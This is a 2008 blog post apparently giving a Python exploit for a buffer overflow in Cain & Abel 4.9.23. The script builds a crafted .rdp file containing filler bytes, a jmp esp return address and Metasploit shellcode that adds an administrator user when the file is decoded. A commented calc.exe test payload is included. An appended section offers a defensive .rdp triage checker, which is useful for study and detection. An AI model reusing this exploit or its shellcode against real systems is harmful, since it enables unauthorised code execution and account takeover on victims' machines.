Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit
Source: encrypt3d.blogspot.com  Author: Encrypt3d  Published: 2008-12-04
#exploit.py
print ""
print "                 !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""

# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
# Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";

# and if you want to test it..this shellcode will open calc.exe
#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
#shellcode+= "\xd7\xab\x63\x3d";

eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7

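# File layout: 8206 filler bytes, the return address (written twice), 10 NOP bytes, then the shellcode
chars = "E"*8206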
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
file = open('cain.rdp','w')
file.write (chars+eip+eip+"\x90"*10+shellcode)
file.close()
print "D0NE!"
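
A defender-side check, added here as an example and not part of the original post: a triage pass that inspects an .rdp file before it is handed to any parser or password decoder. The thresholds, function names and sample bytes are assumptions constructed for illustration, and the code is Python 3.

```python
import re

# Assumed limits for triage; tune them to the .rdp files seen in your environment.
MAX_LINE = 4096   # longest line accepted
MAX_RUN = 256     # longest run of one repeated character accepted
SETTING = re.compile(r"^[^:\r\n]+:[isb]:.*$")   # name:type:value

def decode_rdp(raw):
    """Decode .rdp bytes: UTF-16LE when a BOM is present, single-byte otherwise."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def is_control(c):
    """True for control characters other than CR, LF and tab."""
    o = ord(c)
    return (o < 0x20 and c not in "\r\n\t") or 0x7f <= o <= 0x9f

def triage_rdp(raw):
    """Return the reasons this file should not be passed to a parser or decoder."""
    findings = []
    text = decode_rdp(raw)
    if any(is_control(c) for c in text):
        findings.append("non-printable characters")
    if re.search(r"(.)\1{%d,}" % MAX_RUN, text):
        findings.append("long run of one repeated character")
    for n, line in enumerate(text.splitlines(), 1):
        if len(line) > MAX_LINE:
            findings.append("line %d is %d characters long" % (n, len(line)))
        if line.strip() and not SETTING.match(line):
            findings.append("line %d is not a name:type:value setting" % n)
    return findings

# Constructed samples: a normal settings file, and a file with the same shape as
# the one the script above writes (8206 filler bytes followed by binary data).
# The trailing bytes are placeholders, not the page's payload.
BENIGN = (b"full address:s:host.example\r\nusername:s:alice\r\n"
          b"password 51:b:01000000D08C9DDF\r\n")
MALFORMED = b"E" * 8206 + b"\x01\x02\x03\x04" * 8

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, triage_rdp(blob) or "ok")
```

An empty list means the file looks like an ordinary settings file; any finding is a reason to quarantine it rather than open it in a tool that parses the fields.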

 